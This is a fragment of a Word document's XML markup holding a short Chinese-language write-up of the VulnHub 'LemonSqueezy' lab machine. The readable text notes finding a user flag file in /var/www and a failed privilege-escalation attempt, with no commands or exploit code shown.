            <wp:extent cx="3829247" cy="1041454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5356" w14:textId="61B13104" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38"/>
    <w:p w14:paraId="65B24D54" w14:textId="174BD55B" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在/</w:t>
      </w:r>
      <w:r>
        <w:t>var/www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下得到User</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidR="004B6C99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该是个flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344BDD4" w14:textId="282489F3" w:rsidR="004B6C99" w:rsidRDefault="004B6C99" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CDD2A4E" wp14:editId="0BA7318C">
            <wp:extent cx="2451226" cy="368319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EAB3" w14:textId="22112240" w:rsidR="004B6C99" w:rsidRDefault="004B6C99" w:rsidP="00AB7E38"/>
    <w:p w14:paraId="065BBBA8" w14:textId="1BBA049D" w:rsidR="004B6C99" w:rsidRDefault="004B6C99" w:rsidP="004B6C99">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x04:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A30AD47" w14:textId="5619B5B3" w:rsidR="00063B38" w:rsidRPr="004B6C99" w:rsidRDefault="00530B4B" w:rsidP="004B6C99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>提权卒，这里找不到合适的payload以及合适的脚本进行提权</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00063B38" w:rsidRPr="004B6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EE486" w14:textId="77777777" w:rsidR="007476A4" w:rsidRDefault="007476A4" w:rsidP="00DD06E6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="773A33C7" w14:textId="77777777" w:rsidR="007476A4" w:rsidRDefault="007476A4" w:rsidP="00DD0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D72D6" w14:textId="77777777" w:rsidR="007476A4" w:rsidRDefault="007476A4" w:rsidP="00DD06E6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="196DA238" w14:textId="77777777" w:rsidR="007476A4" w:rsidRDefault="007476A4" w:rsidP="00DD06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FC"/>
    <w:rsid w:val="00063B38"/>
    <w:rsid w:val="00280F2E"/>
    <w:rsid w:val="004B6C99"/>
    <w:rsid w:val="00530B4B"/>
    <w:rsid w:val="005F00EE"/>
    <w:rsid w:val="006D287F"/>
    <w:rsid w:val="006F3A30"/>
    <w:rsid w:val="007476A4"/>
    <w:rsid w:val="00935EFC"/>
    <w:rsid w:val="00A51EE2"/>
    <w:rsid w:val="00AB7E38"/>
    <w:rsid w:val="00B830C7"/>
    <w:rsid w:val="00D0137E"/>
    <w:rsid w:val="00D800C1"/>
    <w:rsid w:val="00DD06E6"/>
    <w:rsid w:val="00EB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EA382"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2EEEBAA6-3745-428B-87EC-B5526759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06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6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06E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D06E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D0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184.162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vulnhub.com/entry/lemonsqueezy-1,473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://192.168.184.162/wordpress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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>wangc</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-01T00:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-01T03:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>